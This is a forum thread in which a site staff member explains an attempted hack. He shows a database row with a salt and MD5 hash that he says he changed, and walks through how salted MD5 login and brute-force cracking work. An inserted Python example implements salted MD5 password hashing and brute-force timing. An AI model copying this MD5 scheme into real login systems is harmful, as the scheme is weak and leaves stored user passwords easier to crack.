    Tournaments Won
    0

    Default Re: Site Hack Attempt

    Even if they got my password they'll be disappointed. The things I need to keep secure all have passwords that might as well be hashed encryptions.

  13. #13
    GrnEyedDvl's Avatar Liberalism is a Socially Transmitted Disease
    Artifex Technical Staff

    Join Date
    Jan 2007
    Location
    Denver CO
    Posts
    23,844
    Blog Entries
    10

    Default Re: Site Hack Attempt

    Quote Originally Posted by djehoety View Post
    So from what I've read our passwords have not been taken, like last time, right?
    I do not believe so, but I cannot promise that 100%.

    If he did get information, it looks like this from my account:

    Code:
    mysql> select userid, username, email, salt, password from user where userid = 21866;
    Connection id:    280
    Current database: totalwar_vb
    
    +--------+------------+---------------------------+--------------------------------+----------------------------------+
    | userid | username   | email                     | salt                           | password                         |
    +--------+------------+---------------------------+--------------------------------+----------------------------------+
    |  21866 | GrnEyedDvl | REMOVED | 8Z}X$247@esoXJXF#&c~",}$5934hui06yhe0CEdL | 60744474c3277428a8be861186e1e368 |
    +--------+------------+---------------------------+--------------------------------+----------------------------------+
    1 row in set (0.57 sec)
    Now, that is not truly my password. It's not even truly my hash or my salt as I changed it before I posted here. When you create your password on TWC it generates what is called a "salt" which is just a randomized set of characters, adds that to the characters you entered for your password, and then generates an MD5 encryption hash out of that combination. The more complex your password is the more complex the hash is and the harder it is to generate a match. The salt and the MD5 hash are what is stored in the database.

    When you enter your password in TWC to login, it takes the characters you entered and adds them to the stored salt value and then uses that value to generate an MD5 hash. It then compares that hash to the hash stored in the database. If they match, you are allowed to login. If they do not match, you are denied.

    If someone managed to grab all that information from my account, they would still have to try a crapload of passwords to try and generate a hash that matches. This is what the "brute force" crack attempt is. They are generating tons of hashes using random characters trying to get a match. The weakness in MD5 is that occasionally you can generate identical hashes with two different password and salt combinations. This is much less likely to happen with newer encryptions like SHA-2.

    If you want to see how this works live then check out this hash encryption generator. You can enter a generic password and see the hash it generates. You can also change the salt value and see that it generates a different hash even if you use the same password.

    For example I entered this:

    Password = password
    Salt = s0mRIdlKvI
    MD5 Hash = 60744474c3277428a8be861186e1e368


    But if I change the salt to 12345 and still use "password" as my password I get a hash of:

    40b1b887502902a8ce61a16e44630f7c



    And if I change the salt to "ABCDEF" I get:

    5ffc552079866e04eacbd73225663dd5


    And if the salt is "abcdef" I get:

    db7dba848f1e5f257618ece2d8a562e1


    So even if this person managed to grab the salt and hash of every member of the site, he still has to spend a TON of time trying to brute force the passwords. He may farm some of that out to hacker collectives, but I doubt it's worth the time for him to do that for TWC members since we do not have any financial data on the site at all. The most productive use of time would be to try and brute force the accounts of me and Squid. Mine would take him bloody forever to run through all the possibilities. And when I say forever, I mean something like 386 quintillion years to try every single possibility if he generates 9,000 keystrokes per second. He may get a lucky hit, but the odds of that are pretty low.

    You can test your password for the length of time it takes to guarantee a brute force attack on it at this site. Select FreeBSD MD5 as the algorithm, enter the number of characters in your password, and select how complex it is, and it will tell you how many days/hours/seconds it would take to try every single possibility. The longer your password, the longer it takes to try every possible combination.

    If your password is just a 6 digit number, it takes about 2 minutes. Change that to a 10 digit number and it takes 13 days. Change that to a 15 digit number and it takes 4 thousand years if he is generating 9,000 keystrokes per second on his attempt. Once you start adding character types the length of time required to crack it goes up exponentially. My passwords are all 15+ characters long and have lots of weird stuff in them, so to try all combinations would literally take forever unless they got a lucky hit.

    Modern brute force attempts are using video cards to process LOTS more keystrokes than they used to be able to do with standard CPUs. In the neighborhood of 348 billion attempts per second on some algorithms, as demonstrated in this article on a machine with 25 high end video cards installed on a server platform. This one cracked 14 character Windows passwords in about 6 minutes. The good thing is that your average hacker cannot come close to affording something like this. I bet this is a $20,000 setup.

    The clustered GPUs clocked impressive speeds against more sturdy hashing algorithms as well, including MD5 (180 billion attempts per second), 63 billion/second for SHA1 and 20 billion/second for passwords hashed using the LM algorithm. So called "slow hash" algorithms fared better. The bcrypt (05) and sha512crypt permitted 71,000 and 364,000 per second, respectively.

    And there are now cloud based hashes generated by the billions, so that if you happen to obtain someone's hash you can enter it into a website and get a match instantly. So, just because I do not believe your information was obtained, change it anyway.
    Last edited by GrnEyedDvl; March 28, 2015 at 05:04 PM.
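    The salt-and-MD5 scheme and the brute force arithmetic from the post above, as an added example that is not part of the original post or of vBulletin's own code. It implements the scheme as the post describes it (hash of the password followed by the salt; the concatenation order is an assumption), and the worst-case timings assume the post's 9,000 guesses per second and the article's 180 billion per second for MD5.

```python
import hashlib
import secrets
import string

# Constructed example; the salts and hashes produced here are not the values
# quoted in the post.
SECONDS_PER_YEAR = 365.25 * 86400


def make_salt(length: int = 30) -> str:
    """Random printable salt, generated per user as the post describes."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


def hash_password(password: str, salt: str) -> str:
    """MD5 of the password concatenated with the salt (assumed order)."""
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest()


def verify(candidate: str, salt: str, stored_hash: str) -> bool:
    """Login check: re-hash the attempt with the stored salt and compare."""
    return secrets.compare_digest(hash_password(candidate, salt), stored_hash)


def brute_force_seconds(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every password of this length and character set."""
    return (charset_size ** length) / guesses_per_second


def brute_force_summary(charset_size: int, length: int, guesses_per_second: float) -> dict:
    """Same worst-case figure expressed in minutes, days and years."""
    s = brute_force_seconds(charset_size, length, guesses_per_second)
    return {"seconds": s, "minutes": s / 60, "days": s / 86400, "years": s / SECONDS_PER_YEAR}


if __name__ == "__main__":
    salt = make_salt()
    stored = hash_password("password", salt)
    print("salt:", salt, "hash:", stored)
    print("correct password accepted:", verify("password", salt, stored))
    print("wrong password rejected:", not verify("Password", salt, stored))
    # The same password with different salts gives different hashes.
    print("salts differ:", hash_password("password", "ABCDEF") != hash_password("password", "abcdef"))
    # Digit-only passwords at the post's 9,000 guesses/s and a GPU cluster's 180 billion/s.
    for length in (6, 10, 15):
        slow = brute_force_summary(10, length, 9_000)
        fast = brute_force_seconds(10, length, 180e9)
        print(f"{length} digits: {slow['days']:.1f} days at 9,000/s, {fast:.3f} s at 180e9/s")
```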

  14. #14
    Magister Militum Flavius Aetius's Avatar δούξ θρᾳκήσιου
    Join Date
    Mar 2010
    Location
    Rock Hill, SC
    Posts
    16,318
    Tournaments Joined
    1
    Tournaments Won
    0

    Default Re: Site Hack Attempt

    Just using all lowercase letters, 10 characters long, it would take 476 years to brute force a password. Add one more character and it jumps up to 12,000.

    E.g. One of my passwords would take 172 million years according to that website.

  15. #15
    The Bold Burgundian's Avatar Ducenarius
    Join Date
    May 2007
    Location
    The Great Metropolis of Hyperbole
    Posts
    997

    Default Re: Site Hack Attempt

    The obvious solution is just to forbid all web traffic and users from the Netherlands. Good, I never liked those rebels anyway.
    T.W.C.
    Total War Cynics

  16. #16
    Col. Tartleton's Avatar Comes Limitis
    Join Date
    Aug 2010
    Location
    Cape Ann
    Posts
    13,053

    Default Re: Site Hack Attempt

    The Dutch are a good honest hard working people who should not be treated unfairly just because their language sounds like they had a head injury.
    The Earth is inhabited by billions of idiots.
    The search for intelligent life continues...

  17. #17

    Default Re: Site Hack Attempt

    Hm, ok, I'm not sure if this is related, but my Malwarebytes Anti-Malware was detecting attacks every time I logged on to TWC on the 22nd, 23rd and 24th. I thought it was a mistake and moved on.
    It has recorded an IP and a website where the attacks actually came from.

  18. #18
    Quintus Hortensius Hortalus's Avatar Lex duodecim tabularum
    Citizen

    Join Date
    Jun 2011
    Location
    Electorate of Hannover
    Posts
    2,530

    Default Re: Site Hack Attempt

    Thanks for the detailed report and explanations GED

    Under the patronage of wangrin my workshop

  19. #19

    Default Re: Site Hack Attempt

    Enoch playing the long game

  20. #20
    Junaidi83 de Bodemloze's Avatar Dont Mess With Me
    Join Date
    Feb 2011
    Location
    Indonesia
    Posts
    2,616

    Default Re: Site Hack Attempt

    Hmm, impressive stuff I'd say; still, I see no reason why he targeted TWC, unless there are credit card numbers or other money related stuff.
    Modding is like accursed wine, you try a sip and you ended empty the whole glass
    Under Proud Patronage of Shankbot de Bodemloze
